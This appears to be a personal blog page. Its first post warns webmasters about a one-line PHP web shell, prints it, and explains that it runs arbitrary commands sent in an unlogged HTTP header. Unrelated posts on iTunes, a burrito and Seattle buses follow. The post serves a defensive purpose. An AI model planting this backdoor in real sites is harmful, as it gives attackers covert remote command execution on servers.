dpk’s weblog

Are you a webmaster who is concerned about hackers infesting your sites? Well, be on the look out for crud like this:

<? passthru(getenv(“HTTP_ACCEPT_jayman”)); ?>

This script can be used by sending whatever command you want in a “Accept-jayman:” HTTP header. “jayman” is just an example (a prevelant one), it could be anything. This can be placed to any of your PHP scripts without affecting your user’s experience, because the header is not something sent by any browser. Headers are also not typically logged anywhere, so the attacker may not be caught by inspecting logs.

I’ve seen this come up quite often, and it actually seems to be getting worse. Most of the time the attackers just want a place to run an IRC bot (iroffer), but often they want to redirect your surfers to their affiliate program links, send spam, or use your site to host their spam advertised content.

If you see something like this in your scripts, or on its own, it was put there by an attacker using another exploitable script on your site. It’s very important to keep your site’s scripts up-to-date, and it’s a good idea to hire someone to audit your code or keep it up to date, if you’re not a programmer yourself. (Be aware that whoever you hire may not actually be able to debug all of your scripts, if any of them use Zend Encoder created files.)

It’s also important to make sure your permissions are not overly open. PHP scripts, typically, run as the web server’s user. If your directory permissions are open (777, for example), and you have an exploitable script, someone could easily create their own files in the directory, and even replace your files with their own copies.

Ultimately, the best advice I can give is to check your site’s contents often, keep your software up to date, keep your permissions sane, and hire someone knowledgable and trustworthy to check out your site if find you need help.

Congratulations to Alex Ostrovsky for downloading the 1000th file from iTunes. That’s quite a feat. I wonder what he’ll do with his 1 terabyte iPod?

From what I could tell this crate, found at the top of the Westin Building’s parking garage, is entirely full of cable.

Sorry about the poor image quality — these are taken with my Treo 600 and without much light.

The Chuggler bought advertising on Gmail to announce their 30oz mug, with a built in 12″ hose, like a “funnel”. They make it clear it’s not to be used with alcoholic beverages, but then half of the photos in their collection are clearly shot in bars. I’m sure they’re drinking apple juice, yeah!

I drink. I used to drink a lot more. I’d like to think I’m not being a hypocrite when I state that this seems like one of the worst ideas ever. I’m sure they’ll sell a million of them, all the same.

I just ate my first TJ’s Brand fresh burrito — holy cow, it was good. If you get one, the first thing you need to do is remove the wrapper and pretend it never existed. The instructions on it assume you have a microwave powered by a 60W bulb (I know that doesn’t make sense). Just wrap it in a paper towel and microwave it for one minute per side. Then, enjoy!

I wish I had a link for them.

Seattle Bus Service, as described by the Seattle PI. I do agree with the general premise, that the current bus system is woefully inadequate. Full busses and infrequent trips just means less “new” riders, forcing more people to drive.

However, it seems to me that if Seattle really wants better bus service for their residents, they should create their own bus system, and let the King County system concentrate on the outlying areas and bringing people in to and out of the city. That should mean more frequent routes for Seattle residents (since the trips are shorter), and less overcrowding on the routes that leave the city.

I’d love to see the pseudo-anonymous “Seattle Post-Intelligencer Editorial Board” writer attempt to get in to town, riding the bus, from outside of town — they’d get to learn how to deal with full Park & Rides, late (or worse: early) busses that run once per hour, standing room only *every day*, etc. If Seattle funded their own bus network, perhaps King County could improve our service.

Seattle was already interested, at least at one point, in creating an incredibly expensive monorail network, with very few stops. That same money could have bought a lot of busses that could have served thousands of stops, without major construction efforts.